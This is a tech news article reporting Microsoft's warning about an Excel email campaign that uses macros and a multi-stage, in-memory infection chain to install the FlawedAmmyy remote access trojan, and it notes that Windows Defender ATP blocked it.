HomeWinBuzzer NewsMicrosoft Warns Users of Excel Email Campaign That Can Compromise Fully-Patched PCs

Microsoft Warns Users of Excel Email Campaign That Can Compromise Fully-Patched PCs

A specially crafted Excel document can use macros to perform a complex infection chain that will run a Remote Access Trojan in the PC's memory. Windows Defender ATP users are protected from the attack.


A few weeks after an Excel vulnerability that let attacks install a trojan, has issued another warning. This time, it concerns a separate, email-based campaign that looks to install the notorious FlawedAmmyy RAT on devices.

Via a specially crafted Excel email attachment, attackers can use malicious macro functions and a “complex infection chain” to run the RAT in memory. FlawwedAmmy rose to notoriety during email campaigns in March 2018. It's thought to have targetted finance and retail and allows full remote access to the PC.

Microsoft discovered the campaign with the help of anomaly detection. It says the attack starts with a .xls attachment in with Korean content.

“When opened, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory,” explained Microsoft Security Intelligence on Twitter.

“This executable then downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19. wsus.exe decrypts and runs the final payload directly in memory.”

Of course, users should never open .xls files from unverified senders, nor should they be enabling macros in Excel by default. Clearly, though, Microsoft thinks this is enough risk that to be warning users.

The good news is that customers with Windows Defender ATP should be safe. The software was able to use machines learning protections to successfully block all components on first sight. This should limit the impact on organizations.

Earlier in the month, the company also warned that attackers are exploiting a flash player exploit via Excel to gain full control of PCs, in what's thought to be a nation-state attack. The flaw has since been patched, but it's clear Excel users should be especially cautious.

Ryan Maskell
Ryan Maskellhttps://ryanmaskell.co.uk
Ryan has had a passion for gaming and technology since early childhood. Fusing the skills from his Creative Writing and Publishing degree with profound technical knowledge, he enjoys covering news about Microsoft. As an avid writer, he is also working on his debut novel.

Recent News